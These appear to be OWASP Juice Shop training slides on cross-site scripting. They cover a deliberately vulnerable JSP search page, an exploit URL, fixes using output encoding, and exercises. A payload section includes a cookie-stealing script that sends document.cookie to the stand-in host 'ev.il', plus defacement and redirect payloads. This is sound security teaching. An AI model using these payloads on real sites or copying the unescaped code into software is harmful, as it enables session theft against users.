XSS

(Cross-Site Scripting)

Cross-Site Scripting

- 1. An attacker can use XSS to send a malicious script to an unsuspecting user
- 2. The end user's browser has *no way to know that the script should not be trusted*, and will execute the script

Root Cause

Web applications vulnerable to XSS...

- 1. ...include untrusted data (usually from an HTTP request) into dynamic content...
- 2. ...that is then sent to a web user without previously validating for malicious content

Typical Impact

- Steal user's session
- Steal sensitive data
- Rewrite the web page
- Redirect user to malicious website

Typical Phishing Email

Dear valued customer!

You won our big lottery which you might not even have participated in! Click on the following totall inconspicious link to claim your prize **now**!

CLICK HER! FREE STUFF! YOU WON!

Sincereely yours,

Bjorn Kimminich CEO of Juice Shop Inc.

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Risk Rating

Cross-Site Scripting (XSS)

| Exploitability | Prevalence | Detecability | Impact | Risk |
|----------------|------------|--------------|----------|------|
| Easy | Widespread | Easy | Moderate | A7 |

X Vulnerable Code Example

```
<!--search.jsp-->
<%String searchCriteria = request.getParameter("searchValue");%>
```

might forward to the following page when executing the search:

```
<!--results.jsp-->
Search results for <b><%=searchCriteria%></b>:

<!-- Render the actual results table here -->
```

Benign Usage

https://my-little-application.com/search.jsp?searchValue=blablubb

results in the following HTML on the results.jsp page:

Search results for blablubb:

rendering as:

Search results for **blablubb**:

Exploit Example

```
https://my-little-application.com/search.jsp?searchValue=</b><img</pre>
```

```
src="https://placekitten.com/g/100/100"/><b>
```

results in the following HTML on the results.jsp page:

```
Search results for <b></b><img src="https://placekitten.com/g/100/100"/><b></b>:
```

rendering as:



Search results for

XSS Attack Payload Examples

Stealing User Session

```
<script>
  new Image().src="http://ev.il/hijack.php?c="+encodeURI(document.cookie);
</script>
```

Site Defacement

```
<script>document.body.background="http://ev.il/image.jpg";</script>
```

Redirect

```
<script>window.location.assign("http://ev.il");</script>
```

Forms of XSS

- Reflected XSS: Application includes unvalidated and unescaped user input as part of HTML output
- **Stored XSS**: Application stores unsanitized user input that is viewed at a later time by another user
- **DOM XSS**: JavaScript frameworks & single-page applications dynamically include attacker-controllable data to a page
- i The previous example vulnerability and exploit of results.jsp is a typical Reflected XSS.

Prevention

- Do not include user supplied input in your output!
- Output Encode all user supplied input
 - e.g. OWASP Java Encoder
- Perform White List Input Validation on user input
- Use an HTML Sanitizer for larger user supplied HTML chunks
 - e.g. OWASP Java HTML Sanitizer

✓ Fixed Code Example

Using Encoder from OWASP Java Encoder Project:

```
<%import org.owasp.encoder.Encoder;%>
Search results for <b><%=Encoder.forHtml(searchCriteria)%></b>:
<!-- ... -->
```

Same result using HtmlUtils from the popular Spring framework:

```
<%import org.springframework.web.util.HtmlUtils;%>
Search results for <b><%=HtmlUtils.htmlEscape(searchCriteria)%></b>:
<!-- ... -->
```

OWASP Java HTML Sanitizer

Fast and easy to configure HTML Sanitizer written in Java which lets you include HTML authored by third-parties in your web application while protecting against XSS.

Using a simple pre-packaged policy

Exercise

- 1. (**) Perform a *DOM XSS* attack (**)
- 2. (**) Use the *Bonus Payload* to enjoy some nice music (**)
- 3. Perform a *Reflected XSS* attack (★)
- 4. Beat a weak Client-side XSS Protection during user registration (\star
- 5. Give the shop feedback bypassing its Server-side XSS Protection (\star \star \star \star)